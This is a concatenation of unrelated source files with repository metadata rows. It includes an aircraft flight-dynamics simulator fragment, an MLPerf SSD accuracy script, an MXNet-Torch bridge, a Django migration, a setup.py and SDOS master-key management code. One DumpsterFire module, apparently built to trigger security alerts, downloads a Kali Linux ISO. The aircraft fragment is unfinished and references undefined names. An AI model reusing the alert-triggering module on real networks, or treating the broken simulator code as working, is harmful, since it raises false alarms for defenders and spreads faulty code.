#CM_lw = self.CM(lw, self.dCM_da_w_, alpha_lw, self.CM0_w_, -aileron, self.dCM_de_w_, self.Y_w_, self.y_w_)
#CM_rw = self.CM(rw, self.dCM_da_w_, alpha_lw, self.CM0_w_, aileron, self.dCM_de_w_, self.Y_w_, self.y_w_)
#CM_lht = self.CM(lht, self.dCM_da_ht_, alpha_lw, self.CM0_ht_, elevator, self.dCM_de_w_, self.Y_w_, self.y_w_)
#CM_rht = self.CM(rht, self.dCM_da_ht_, alpha_lw, self.CM0_ht_, elevator, self.dCM_de_w_, self.Y_w_, self.y_w_)
#CM_vt = self.CM(self.vtail_, self.dCM_da_vt_, alpha_lw, self.CM0_vt_, rudder, self.dCM_de_w_, self.Y_w_, self.y_w_)
# calc constant values
K1 = self.AR_w_*self.e_w_*np.pi
K2 = self.AR_ht_*self.e_ht_*np.pi
K3 = self.AR_vt_*self.e_vt_*np.pi
# calc drag coefficients for wings, ht, vt
CD_lw = self.CD0_w_+CL_lw**2/K1
CD_rw = self.CD0_w_+CL_rw**2/K1
CD_lht = self.CD0_ht_+CL_lht**2/K2
CD_rht = self.CD0_ht_+CL_rht**2/K2
CD_vt = self.CD0_vt_+CL_vt**2/K3
# calc local velocities
Vsq_lw = u_w_lw**2+v_w**2+w_w_lw**2
Vsq_rw = u_w_rw**2+v_w**2+w_w_rw**2
Vsq_lht = u_ht_lht**2+v_ht**2+w_ht_lht**2
Vsq_rht = u_ht_rht**2+v_ht**2+w_ht_rht**2
Vsq_vt = u_vt**2+v_vt**2+w_vt**2
# constants, elemental areas for wings, ht, vt
K = 0.5*self.rho_
A_w = self.w_el_*self.chord_w_
A_ht = self.ht_el_*self.chord_ht_
A_vt = self.vt_el_*self.chord_vt_
# calc lift force in wings, ht, vt
LIFT_LW = CL_lw*K*Vsq_lw*np.flip(A_w, 0)
LIFT_RW = CL_rw*K*Vsq_rw*A_w
LIFT_LHT = CL_lht*K*Vsq_lht*np.flip(A_ht, 0)
LIFT_RHT = CL_rht*K*Vsq_rht*A_ht
LIFT_VT = CL_vt*K*Vsq_vt*A_vt
# calc drag force in wings, ht, vt
DRAG_LW = CD_lw*K*Vsq_lw*np.flip(A_w, 0)
DRAG_RW = CD_rw*K*Vsq_rw*A_w
DRAG_LHT = CD_lht*K*Vsq_lht*np.flip(A_ht, 0)
DRAG_RHT = CD_rht*K*Vsq_rht*A_ht
DRAG_VT = CD_vt*K*Vsq_vt*A_vt
# calc pitching moments in wings, ht, vt
#PITCH_LW = CM_lw*K*Vsq_lw*np.flip(A_ht, 0)*np.flip(self.chord_w_, 0)
#PITCH_RW = CM_rw*K*Vsq_rw*A_w*self.chord_w_
#PITCH_LHT = CM_lht*K*Vsq_lht*np.flip(A_ht, 0)*np.flip(self.chord_ht_, 0)
#PITCH_RHT = CM_rht*K*Vsq_rht*A_ht*self.chord_ht_
#PITCH_VT = CM_vt*K*Vsq_vt*A_vt*self.chord_vt_
# total pitching moment due to lift and sweep'
#TOTAL_PITCH = PITCH_LW+PITCH_RW+PITCH_LHT+PITCH_RHT+PITCH_VT
# calc force in body X direction in wings, ht, vt
LW_X = LIFT_LW*np.sin(alpha_lw)-DRAG_LW*np.cos(alpha_lw)
RW_X = LIFT_RW*np.sin(alpha_rw)-DRAG_RW*np.cos(alpha_rw)
LHT_X = LIFT_LHT*np.sin(alpha_lht)-DRAG_LHT*np.cos(alpha_lht)
RHT_X = LIFT_RHT*np.sin(alpha_rht)-DRAG_RHT*np.cos(alpha_rht)
VT_X = LIFT_VT*np.sin(alpha_vt)-DRAG_VT*np.cos(alpha_vt)
# calc force in body Y direction in wings, ht, vt
VT_Y = LIFT_VT*np.cos(alpha_vt)+DRAG_VT*np.sin(alpha_vt)
# calc force in body Z direction in wings, ht, vt
LW_Z = LIFT_LW*np.cos(alpha_lw)+DRAG_LW*np.sin(alpha_lw)
RW_Z = LIFT_RW*np.cos(alpha_rw)+DRAG_RW*np.sin(alpha_rw)
LHT_Z = LIFT_LHT*np.cos(alpha_lht)+DRAG_LHT*np.sin(alpha_lht)
RHT_Z = LIFT_RHT*np.cos(alpha_rht)+DRAG_RHT*np.sin(alpha_rht)
# Total body forces
XF = float(thrust)+np.sum(LW_X)+np.sum(RW_X)+np.sum(LHT_X)+np.sum(RHT_X)+np.sum(VT_X)
YF = np.sum(VT_Y)
ZF = np.sum(LW_Z)+np.sum(RW_Z)+np.sum(LHT_Z)+np.sum(RHT_Z)
# Moments about body X, Y, Z axes
LM = np.sum(-lw*LW_Z-rw*RW_Z)+np.sum(-lht*LHT_Z-rht*RHT_Z)+np.sum(self.vtail_*VT_Y)
MM = np.sum((LW_Z+RW_Z)*(self.x_cg_-self.x_ac_w_))+np.sum((LHT_Z+RHT_Z)*(self.x_cg_-self.x_ac_ht_))+\
np.sum(self.vtail_*VT_X)#+np.sum(TOTAL_PITCH)
NM = np.sum(-rw*RW_X-lw*LW_X)+np.sum(-rht*RHT_X-lht*LHT_X)
print(XF, YF, ZF, LM, MM, NM)
return [XF, YF, ZF, LM, MM, NM]
# uses an interpolation function to calculate the exhaust velocity and thrust of the prop using momentum theory
def thrustcalc( self,
power,
u):
if power>0:
u2 = self.U2func(power, u)
force = 0.5*rho*diskA*(u2**2-u**2)
else:
force = 0
return force
# calculates the chord of the wing at each point in its station
def chord( self,
wing,
span,
area,
rc,
tc):
k = tc/rc
A = 2*area/((1+k)*span)
B = 1*(1-k)/span
res = A*(1-B*wing)
return res
# calculates the lift coefficient at each station along the wing
def CL( self,
wing,
dCL_da,
alpha,
CL0,
displacement,
dCL_de,
pos1,
pos2):
aileronCL = self.heaviside(wing, pos1, pos2)
stalled = (alpha >= self.alphamin_) & (alpha <= self.alphamax_)
res = stalled.astype(int)*(CL0+dCL_da*alpha+aileronCL*dCL_de*displacement)
return res
# calculates the moment coefficient at each station along the wing
def CM( self,
wing,
dCM_da,
alpha,
CM0,
displacement,
dCM_de,
pos1,
pos2):
aileronCL = self.heaviside(wing, pos1, pos2)
stalled = (alpha >= alphamin) & (alpha <= alphamax)
res = stalled.astype(int)*(CM0+dCM_da*alpha+aileronCL*dCM_de*displacement)
return res
# heaviside operator, returns a vector of 1s and 0s to make array operations easier
def heaviside( self,
wing,
pos1,
pos2):
res = (wing >= pos1) & (wing <= pos2)
return res.astype(int)
# leap frog integrator to calculate accelerations velocities in the body frame, and calc displacement'
# in the inertial frame
def nlti( self,
u,
v,
w,
p,
q,
r,
x,
y,
z,
phi,
theta,
psi,
A):
# linear accelerations in the body frame
du_dt = float(A[0]/self.m_-self.g_*np.sin(theta)-q*w+r*v)
dv_dt = float(A[1]/self.m_+self.g_*np.cos(theta)*np.sin(phi)-r*u+p*w)
dw_dt = float(A[2]/self.m_+self.g_*np.cos(theta)*np.cos(phi)-p*v+q*u)
# angular accelerations in the body frame
dp_dt = float(A[3]/self.Ixx_-(self.Izz_-self.Iyy_)/self.Ixx_*q*r)
dq_dt = float(A[4]/self.Iyy_-(self.Ixx_ - self.Izz_)/self.Iyy_*r*p)
dr_dt = float(A[5]/self.Izz_-(self.Iyy_ - self.Ixx_)/self.Izz_*p*q)
# half time step representation of linear velocities
u += 0.5*(self.udot_+du_dt)*self.timestep_
v += 0.5*(self.vdot_+dv_dt)*self.timestep_
w += 0.5*(self.wdot_+dw_dt)*self.timestep_
# half time step representation of angular velocities
p += 0.5*(self.pdot_+dp_dt)*self.timestep_
q += 0.5*(self.qdot_+dq_dt)*self.timestep_
r += 0.5*(self.rdot_+dr_dt)*self.timestep_
# using cosine matrices to convert velocities and accelerations to inertial frame
# (is there a better way to handle accelerations?)
I = self.lindcm([-phi, -theta, -psi], [du_dt, dv_dt, dw_dt])
X = self.lindcm([-phi, -theta, -psi], [u, v, w])
J = self.angdcm([-phi, -theta, -psi], [dp_dt, dq_dt, dr_dt])
W = self.angdcm([-phi, -theta, -psi], [p, q, r])
# linear displacements in the inertial frame
x += X[0]*self.timestep_+0.5*I[0]*self.timestep_**2
y += X[1]*self.timestep_+0.5*I[1]*self.timestep_**2
z += X[2]*self.timestep_+0.5*I[2]*self.timestep_**2
# angular displacements in the inertial frame
phi += W[0]*self.timestep_+0.5*J[0]*self.timestep_**2
theta += W[1]*self.timestep_+0.5*J[1]*self.timestep_**2
psi += W[2]*self.timestep_+0.5*J[2]*self.timestep_**2
# store velocities so that in the next step, the half time step velocities can be calculated'
self.udot_ = du_dt
self.vdot_ = dv_dt
self.wdot_ = dw_dt
self.pdot_ = dp_dt
self.qdot_ = dq_dt
self.rdot_ = dr_dt
return [u, v, w,
p, q, r,
x, y, z,
phi, theta, psi]
# direction cosine matrix function
def lindcm( self,
A,
B):
phi = A[0]
theta = A[1]
psi = A[2]
DCM = np.array([[np.cos(theta)*np.cos(psi), np.cos(theta)*np.sin(psi), -np.sin(theta)],
[np.sin(phi)*np.sin(theta)*np.cos(psi)-np.cos(phi)*np.sin(psi),
np.sin(phi)*np.sin(theta)*np.sin(psi)+np.cos(phi)*np.cos(psi),
np.sin(phi)*np.cos(theta)],
[np.cos(phi)*np.sin(theta)*np.cos(psi)+np.sin(phi)*np.sin(psi),
np.cos(phi)*np.sin(theta)*np.sin(psi)-np.sin(phi)*np.cos(psi),
np.cos(phi)*np.cos(theta)]])
transform = np.dot(np.transpose(DCM), np.array(B))
return transform
# angular cosine matrix function
def angdcm( self,
A,
B):
phi = A[0]
theta = A[1]
ACM = np.array([[1, np.sin(phi)*np.tan(theta), np.cos(phi)*np.tan(theta)],
[0, np.cos(phi), -np.sin(phi)],
[0, np.sin(phi)/np.cos(theta), np.cos(phi)/np.cos(theta)]])
W = np.dot(ACM, np.array(B))
return W
# calculate body force and moment coefficients
def coefs( self,
u,
v,
w,
A):
XF, YF, ZF = A[0], A[1], A[2]
LM, MM, NM = A[3], A[4], A[5]
q = 0.5*self.rho_*(u**2+v**2+w**2)
CX = XF/q/self.Sref_w_
CY = YF/q/self.Sref_w_
CZ = ZF/q/self.Sref_w_
CL = LM/q/self.Sref_w_/self.wspan_
CM = MM/q/self.Sref_w_/self.cbar_w_
CN = NM/q/self.Sref_w_/self.wspan_
return [CX, CY, CZ, CL, CM, CN]
def plotaircraft( ax,
X):
x, y, z = X[0:3]
# generate geometry using sizing
# xltedge =
yltedge = np.linspace(-self.wspan/2, 0, 50)
zltedge = np.zeros_like(yltedge)
# xrtedge =
yrtedge = np.linspace(0, self.wspan/2, 50)
zrtedge = np.zeros_like(yrtedge)
xltip = np.linspace(0, tc_w,50)
# yltip
zltip = np.zeros_like(xrtip)
xrtip = np.linspace(0, tc_w,50)
# yrtip
# xlledge =
# xrledge =
# ylledge =
# yrledge =
# rotate geometry
# plot geometry
| gpl-3.0 | -3,505,475,472,434,140,700 | 35.511036 | 126 | 0.487608 | false | 2.815528 | false | false | false |
TryCatchHCF/DumpsterFire | FireModules/FileDownloads/download_kali.py | 1 | 1314 | #!/usr/bin/python
#
# Filename:
#
# Version: 1.0.0
#
# Author: Joe Gervais (TryCatchHCF)
#
# Summary:
#
# Part of the DumpsterFire Toolset. See documentation at https://github.com/TryCatchHCF/DumpsterFire
#
#
# Description:
#
#
# Example:
#
#
import os, sys, urllib
from FireModules.fire_module_base_class import *
class download_kali( FireModule ):
def __init__(self):
self.commentsStr = "FileDownloads/download_kali"
def __init__(self, moofStr):
self.moofStr = moofStr
self.commentsStr = "FileDownloads/download_kali"
return;
def Description( self ):
self.Description = "Downloads Kali distro to local directory"
return self.Description
def Configure( self ):
self.mDirectoryPath = raw_input( "Enter Directory Path to download files into: " )
return
def GetParameters( self ):
return self.mDirectoryPath
def SetParameters( self, parametersStr ):
self.mDirectoryPath = parametersStr
return
def ActivateLogging( self, logFlag ):
print self.commentsStr + ": Setting Logging flag!"
print logFlag
return
def Ignite( self ):
self.filepath = self.mDirectoryPath + "/" + 'kali.iso'
print self.commentsStr + ": Downloading Kali to: " + self.filepath
urllib.urlretrieve( 'http://cdimage.kali.org/kali-2017.2/kali-linux-2017.2-amd64.iso', self.filepath )
return
| mit | -2,891,286,367,684,792,000 | 20.193548 | 104 | 0.713851 | false | 3.041667 | false | false | false |
sternoru/goscalecms | setup.py | 1 | 1601 | import os
import imp
try:
imp.find_module('setuptools')
except ImportError:
from ez_setup import use_setuptools
use_setuptools()
from setuptools import setup, find_packages
README = open('README.rst').read()
setup(
name = "goscalecms",
version = __import__('goscale').__version__,
packages = find_packages(),
author = "Evgeny Demchenko",
author_email = "[email protected]",
description = "GoScale CMS is an extension of Django CMS. It's a set of unique plugins and useful tools for Django CMS that makes it very powerful by seamlessly integrating content from 3rd party websites to make mashups.",
long_description = README,
license = "BSD",
keywords = "goscale cms django themes content management system mashup google ajax",
url = "https://github.com/sternoru/goscalecms",
include_package_data = True,
classifiers=[
"Development Status :: 3 - Alpha",
"Topic :: Internet :: WWW/HTTP :: Site Management",
"Environment :: Web Environment",
"Framework :: Django",
"Intended Audience :: Developers",
"Natural Language :: English",
"Natural Language :: French",
"Natural Language :: Russian",
"Programming Language :: Python",
"Programming Language :: JavaScript",
"License :: OSI Approved :: BSD License",
],
install_requires = [
"pytz",
"unidecode",
"BeautifulSoup",
"feedparser",
"gdata",
"python-dateutil",
"simplejson",
"Django>=1.4,<1.6",
"django-cms==2.4",
]
)
| bsd-3-clause | -6,431,777,091,402,744,000 | 31.02 | 227 | 0.620862 | false | 4.042929 | false | false | false |
mlperf/inference_results_v0.7 | open/Inspur/code/ssd-resnet34/tensorrt/infer.py | 12 | 5389 | #!/usr/bin/env python3
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ctypes
import os, sys
# The plugin .so file has to be loaded at global scope and before `import torch` to avoid cuda version mismatch.
NMS_OPT_PLUGIN_LIBRARY="build/plugins/NMSOptPlugin/libnmsoptplugin.so"
if not os.path.isfile(NMS_OPT_PLUGIN_LIBRARY):
raise IOError("{}\n{}\n".format(
"Failed to load library ({}).".format(NMS_OPT_PLUGIN_LIBRARY),
"Please build the NMS Opt plugin."
))
ctypes.CDLL(NMS_OPT_PLUGIN_LIBRARY)
import argparse
import json
import time
sys.path.insert(0, os.getcwd())
from code.common.runner import EngineRunner, get_input_format
from code.common import logging
import code.common.arguments as common_args
import numpy as np
import torch
import tensorrt as trt
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
def run_SSDResNet34_accuracy(engine_file, batch_size, num_images, verbose=False, output_file="build/out/SSDResNet34/dump.json"):
threshold = 0.20
runner = EngineRunner(engine_file, verbose=verbose)
input_dtype, input_format = get_input_format(runner.engine)
if input_dtype == trt.DataType.FLOAT:
format_string = "fp32"
elif input_dtype == trt.DataType.INT8:
if input_format == trt.TensorFormat.LINEAR:
format_string = "int8_linear"
elif input_format == trt.TensorFormat.CHW4:
format_string = "int8_chw4"
image_dir = os.path.join(os.getenv("PREPROCESSED_DATA_DIR", "build/preprocessed_data"),
"coco/val2017/SSDResNet34", format_string)
val_annotate = os.path.join(os.getenv("PREPROCESSED_DATA_DIR", "build/preprocessed_data"),
"coco/annotations/instances_val2017.json")
coco = COCO(annotation_file=val_annotate)
image_ids = coco.getImgIds()
cat_ids = coco.getCatIds()
# Class 0 is background
cat_ids.insert(0, 0)
num_images = min(num_images, len(image_ids))
logging.info("Running validation on {:} images. Please wait...".format(num_images))
coco_detections = []
batch_idx = 0
for image_idx in range(0, num_images, batch_size):
end_idx = min(image_idx + batch_size, num_images)
img = []
img_sizes = []
for idx in range(image_idx, end_idx):
image_id = image_ids[idx]
img.append(np.load(os.path.join(image_dir, coco.imgs[image_id]["file_name"] + ".npy")))
img_sizes.append([coco.imgs[image_id]["height"], coco.imgs[image_id]["width"]])
img = np.stack(img)
start_time = time.time()
outputs = runner([img], batch_size=batch_size)
trt_detections = outputs[0]
if verbose:
logging.info("Batch {:d} >> Inference time: {:f}".format(batch_idx, time.time() - start_time))
for idx in range(0, end_idx - image_idx):
keep_count = trt_detections[idx * (200 * 7 + 1) + 200 * 7].view('int32')
trt_detections_batch = trt_detections[idx * (200 * 7 + 1):idx * (200 * 7 + 1) + keep_count * 7].reshape(keep_count, 7)
image_height = img_sizes[idx][0]
image_width = img_sizes[idx][1]
for prediction_idx in range(0, keep_count):
loc = trt_detections_batch[prediction_idx, [2, 1, 4, 3]]
label = trt_detections_batch[prediction_idx, 6]
score = float(trt_detections_batch[prediction_idx, 5])
bbox_coco_fmt = [
loc[0] * image_width,
loc[1] * image_height,
(loc[2] - loc[0]) * image_width,
(loc[3] - loc[1]) * image_height,
]
coco_detection = {
"image_id": image_ids[image_idx + idx],
"category_id": cat_ids[int(label)],
"bbox": bbox_coco_fmt,
"score": score,
}
coco_detections.append(coco_detection)
batch_idx += 1
output_dir = os.path.dirname(output_file)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
with open(output_file, "w") as f:
json.dump(coco_detections, f)
cocoDt = coco.loadRes(output_file)
eval = COCOeval(coco, cocoDt, 'bbox')
eval.params.imgIds = image_ids[:num_images]
eval.evaluate()
eval.accumulate()
eval.summarize()
map_score = eval.stats[0]
logging.info("Get mAP score = {:f} Target = {:f}".format(map_score, threshold))
return (map_score >= threshold * 0.99)
def main():
args = common_args.parse_args(common_args.ACCURACY_ARGS)
logging.info("Running accuracy test...")
run_SSDResNet34_accuracy(args["engine_file"], args["batch_size"], args["num_samples"],
verbose=args["verbose"])
if __name__ == "__main__":
main()
| apache-2.0 | 930,155,146,158,092,900 | 36.685315 | 130 | 0.62442 | false | 3.345127 | false | false | false |
pydanny/django-admin2 | example/files/migrations/0001_initial.py | 2 | 1262 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='CaptionedFile',
fields=[
('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),
('caption', models.CharField(max_length=200, verbose_name='caption')),
('publication', models.FileField(verbose_name='Uploaded File', upload_to='captioned-files')),
],
options={
'verbose_name': 'Captioned File',
'verbose_name_plural': 'Captioned Files',
},
),
migrations.CreateModel(
name='UncaptionedFile',
fields=[
('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),
('publication', models.FileField(verbose_name='Uploaded File', upload_to='uncaptioned-files')),
],
options={
'verbose_name': 'Uncaptioned File',
'verbose_name_plural': 'Uncaptioned Files',
},
),
]
| bsd-3-clause | -9,021,473,371,332,954,000 | 34.055556 | 114 | 0.546751 | false | 4.539568 | false | false | false |
indhub/mxnet | python/mxnet/torch.py | 11 | 6714 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
"""Interface for NDArray functions executed by torch backend.
Install Torch and compile with USE_TORCH=1 to use this module."""
from __future__ import absolute_import
import ctypes
import sys
from .base import _LIB
from .base import c_array, c_str_array, c_handle_array, py_str, build_param_doc as _build_param_doc
from .base import mx_uint, mx_float, FunctionHandle
from .base import check_call
from .ndarray import NDArray, _new_empty_handle
try:
_LUAJIT = ctypes.CDLL("libluajit.so", mode=ctypes.RTLD_GLOBAL)
except OSError:
_LUAJIT = None
# pylint: disable=too-many-locals, invalid-name
def _make_torch_function(handle):
"""Create a Torch function from the FunctionHandle."""
# Get the property of function
n_used_vars = mx_uint()
n_scalars = mx_uint()
n_mutate_vars = mx_uint()
type_mask = ctypes.c_int()
check_call(_LIB.MXFuncDescribe(
handle,
ctypes.byref(n_used_vars),
ctypes.byref(n_scalars),
ctypes.byref(n_mutate_vars),
ctypes.byref(type_mask)))
n_mutate_vars = n_mutate_vars.value
n_used_vars = n_used_vars.value
n_scalars = n_scalars.value
type_mask = type_mask.value
# Get the information from the function
name = ctypes.c_char_p()
desc = ctypes.c_char_p()
num_args = mx_uint()
arg_names = ctypes.POINTER(ctypes.c_char_p)()
arg_types = ctypes.POINTER(ctypes.c_char_p)()
arg_descs = ctypes.POINTER(ctypes.c_char_p)()
ret_type = ctypes.c_char_p()
check_call(_LIB.MXFuncGetInfo(
handle, ctypes.byref(name), ctypes.byref(desc),
ctypes.byref(num_args),
ctypes.byref(arg_names),
ctypes.byref(arg_types),
ctypes.byref(arg_descs),
ctypes.byref(ret_type)))
func_name = py_str(name.value)
if not func_name.startswith('_th_'):
return None
narg = int(num_args.value)
param_str = _build_param_doc(
[py_str(arg_names[i]) for i in range(narg)],
[py_str(arg_types[i]) for i in range(narg)],
[py_str(arg_descs[i]) for i in range(narg)])
if n_mutate_vars > 1:
res = ','.join(['res%d '%i for i in range(n_mutate_vars)])
else:
res = 'res '
doc_str = (('Interface for Torch function {name}.\n' +
'Invoke with\n{res}= mxnet.th.{name}(Parameters)\nor\n'+
'mxnet.th.{name}({res}, Parameters).\n\n' +
'{param_str}\n' +
'Reference: ' +
'https://github.com/torch/torch7/blob/master/doc/maths.md\n').format(
name=func_name[4:], param_str=param_str,
res=res))
def generic_torch_function(*args, **kwargs):
"""Invoke this function by passing in parameters.
Parameters
----------
*args
Positional arguments of inputs (both scalar and `NDArray`).
Returns
-------
out : NDArray
The result NDArray(tuple) of result of computation.
"""
ndargs = []
arg_format = ''
value = ''
for arg in args:
if isinstance(arg, NDArray):
ndargs.append(arg)
arg_format += 'n'
value += ','
elif isinstance(arg, int):
arg_format += 'i'
value += str(arg) + ','
elif isinstance(arg, str):
arg_format += 's'
value += str(arg) + ','
elif isinstance(arg, float):
arg_format += 'f'
value += str(arg) + ','
elif isinstance(arg, bool):
arg_format += 'b'
value += str(arg) + ','
value = value[:-1]
if len(ndargs) == n_used_vars:
ndargs = [NDArray(_new_empty_handle()) for _ in range(n_mutate_vars)] + ndargs
arg_format = 'n'*n_mutate_vars + arg_format
value = ','*n_mutate_vars + value
elif len(ndargs) == n_mutate_vars + n_used_vars:
pass
else:
raise AssertionError(('Incorrect number of input NDArrays. ' +
'Need to be either %d (inputs) or %d ' +
'(output buffer) + %d (input)') %
(n_used_vars, n_mutate_vars, n_used_vars))
kwargs['format'] = arg_format
kwargs['args'] = value
for k in kwargs:
kwargs[k] = str(kwargs[k])
check_call(_LIB.MXFuncInvokeEx(
handle,
c_handle_array(ndargs[n_mutate_vars:]), # pylint: disable=invalid-slice-index
c_array(mx_float, []),
c_handle_array(ndargs[:n_mutate_vars]), # pylint: disable=invalid-slice-index
ctypes.c_int(len(kwargs)),
c_str_array(kwargs.keys()),
c_str_array(kwargs.values())))
if n_mutate_vars == 1:
return ndargs[0]
else:
return ndargs[:n_mutate_vars] # pylint: disable=invalid-slice-index
# End of function declaration
ret_function = generic_torch_function
ret_function.__name__ = func_name[4:]
ret_function.__doc__ = doc_str
return ret_function
# pylint: enable=too-many-locals, invalid-name
def _init_torch_module():
"""List and add all the torch backed ndarray functions to current module."""
plist = ctypes.POINTER(FunctionHandle)()
size = ctypes.c_uint()
check_call(_LIB.MXListFunctions(ctypes.byref(size),
ctypes.byref(plist)))
module_obj = sys.modules[__name__]
for i in range(size.value):
hdl = FunctionHandle(plist[i])
function = _make_torch_function(hdl)
# if function name starts with underscore, register as static method of NDArray
if function is not None:
setattr(module_obj, function.__name__, function)
# Initialize the NDArray module
_init_torch_module()
| apache-2.0 | -7,899,274,321,398,590,000 | 35.688525 | 99 | 0.584748 | false | 3.691039 | false | false | false |
timwaizenegger/osecm-sdos | mcm/sdos/core/MasterKeySource.py | 2 | 15616 | #!/usr/bin/python
# coding=utf-8
"""
Project MCM - Micro Content Management
SDOS - Secure Delete Object Store
Copyright (C) <2017> Tim Waizenegger, <University of Stuttgart>
This software may be modified and distributed under the terms
of the MIT license. See the LICENSE file for details.
"""
import io
import logging
from swiftclient import ClientException
from sdos.crypto import CryptoLib
from sdos.crypto.DataCrypt import DataCrypt
OUTERHEADER = 'SDOS_MKEY_V1\0\0\0\0'.encode(encoding='utf_8', errors='strict') # should be 16 bytes long
KEYOBJNAME = 'masterkey.sdos'
###############################################################################
###############################################################################
# factory
###############################################################################
###############################################################################
def masterKeySourceFactory(swiftBackend, keysource_type, container_name_mgmt, tpm_key_id=None):
"""
select and initialize on of the key sources
:param swiftBackend:
:param keysource_type:
:param container_name_mgmt:
:param tpm_key_id:
:return:
"""
if keysource_type == MasterKeyDummy.my_key_type:
return MasterKeyDummy()
elif keysource_type == MasterKeyStatic.my_key_type:
return MasterKeyStatic(swiftBackend=swiftBackend, container_name_mgmt=container_name_mgmt)
elif keysource_type == MasterKeyPassphrase.my_key_type:
return MasterKeyPassphrase(swiftBackend=swiftBackend, container_name_mgmt=container_name_mgmt)
elif keysource_type == MasterKeyTPM.my_key_type:
return MasterKeyTPM(swiftBackend=swiftBackend, container_name_mgmt=container_name_mgmt, tpm_key_id=tpm_key_id)
else:
raise TypeError("could not create master key source. type missing or wrong: {}".format(keysource_type))
###############################################################################
###############################################################################
# master key load/store
###############################################################################
###############################################################################
def load_wrapped_key(containerNameSdosMgmt, swiftBackend):
logging.info("loading the wrapped master key from {}".format(containerNameSdosMgmt))
try:
obj = swiftBackend.getObject(container=containerNameSdosMgmt, name=KEYOBJNAME)
except ClientException:
logging.warning('master key obj was not found in swift container {}'.format(containerNameSdosMgmt))
return None
mkh = obj.read(len(OUTERHEADER))
if not mkh == OUTERHEADER:
raise TypeError('file header mismatch on master key obj for container {}'.format(containerNameSdosMgmt))
by = io.BytesIO(obj.read())
obj.close()
return by
def store_wrapped_key(containerNameSdosMgmt, swiftBackend, wrapped_key):
logging.info("writing the wrapped master key to {}".format(containerNameSdosMgmt))
obj = OUTERHEADER + wrapped_key.getbuffer()
swiftBackend.putObject(container=containerNameSdosMgmt, name=KEYOBJNAME, dataObject=obj)
logging.debug('wrote master key to swift mgmt container {}'.format(containerNameSdosMgmt))
###############################################################################
###############################################################################
# dummy key source
# a random key each time. no back end requests, key is only in memory during run
###############################################################################
###############################################################################
class MasterKeyDummy(object):
my_key_type = "dummy"
def __init__(self):
self.swiftBackend=None
self.get_new_key_and_replace_current()
###############################################################################
# API for SDOS
###############################################################################
def get_current_key(self):
return self.plainMasterKey
# return CryptoLib.digestKeyString("hallo")
def get_new_key_and_replace_current(self):
self.plainMasterKey = CryptoLib.generateRandomKey()
self.plainMasterKeyBackup = self.plainMasterKey
return self.plainMasterKey
# return CryptoLib.digestKeyString("hallo")
###############################################################################
# API for Swift/Bluebox
###############################################################################
def get_status_json(self):
return {
'type': self.my_key_type,
'is_unlocked': bool(self.plainMasterKey),
'key_id': CryptoLib.getKeyAsId(self.plainMasterKey),
'is_next_deletable_ready': True
}
def clear_next_deletable(self):
pass
def provide_next_deletable(self, passphrase):
pass
def lock_key(self):
self.plainMasterKey = None
def unlock_key(self, passphrase=None):
self.plainMasterKey = self.plainMasterKeyBackup
###############################################################################
###############################################################################
# static key source
# a static, hard-coded master key for testing/development
###############################################################################
###############################################################################
class MasterKeyStatic(object):
STATIC_KEY = CryptoLib.digestKeyString('ALWAYS_THE_SAME')
my_key_type = "static"
def __init__(self, swiftBackend, container_name_mgmt):
self.containerNameSdosMgmt = container_name_mgmt
self.swiftBackend = swiftBackend
self.plainMasterKey = None
try:
self.unlock_key()
except:
logging.error("unlocking master key failed for {}! Key source is not ready...".format(
self.containerNameSdosMgmt))
###############################################################################
# API for SDOS
###############################################################################
def get_current_key(self):
if not self.plainMasterKey:
raise KeyError("Master key is not available")
return self.plainMasterKey
def get_new_key_and_replace_current(self):
new_master = CryptoLib.generateRandomKey()
self.plainMasterKey = new_master
dc = DataCrypt(self.STATIC_KEY)
wrapped_key = dc.encryptBytesIO(io.BytesIO(new_master))
store_wrapped_key(containerNameSdosMgmt=self.containerNameSdosMgmt, swiftBackend=self.swiftBackend,
wrapped_key=wrapped_key)
return self.plainMasterKey
###############################################################################
# API for Swift/Bluebox
###############################################################################
def get_status_json(self):
return {
'type': self.my_key_type,
'is_unlocked': bool(self.plainMasterKey),
'key_id': CryptoLib.getKeyAsId(self.plainMasterKey),
'is_next_deletable_ready': True
}
def clear_next_deletable(self):
pass
def provide_next_deletable(self, passphrase):
pass
def lock_key(self):
self.plainMasterKey = None
def unlock_key(self, passphrase=None):
logging.info("unlocking the master key from {}".format(self.containerNameSdosMgmt))
by = load_wrapped_key(containerNameSdosMgmt=self.containerNameSdosMgmt, swiftBackend=self.swiftBackend)
if not by:
logging.error("no wrapped key found in {}. Assuming first run, creating default key".format(
self.containerNameSdosMgmt))
self.get_new_key_and_replace_current()
return
try:
dc = DataCrypt(self.STATIC_KEY)
plain = dc.decryptBytesIO(by)
self.plainMasterKey = plain.read()
except:
raise KeyError("Failed decrypting master key")
###############################################################################
###############################################################################
# passphrase key source
# use a pass phrase as deletable key. the master key will be encrypted with a different
# password each time.
###############################################################################
###############################################################################
class MasterKeyPassphrase(object):
my_key_type = "passphrase"
def __init__(self, swiftBackend, container_name_mgmt):
self.containerNameSdosMgmt = container_name_mgmt
self.swiftBackend = swiftBackend
self.plainMasterKey = None
self.next_deletable = None
logging.error("Passphrase key source initialized for {}. ... set the passphrase to unlock".format(
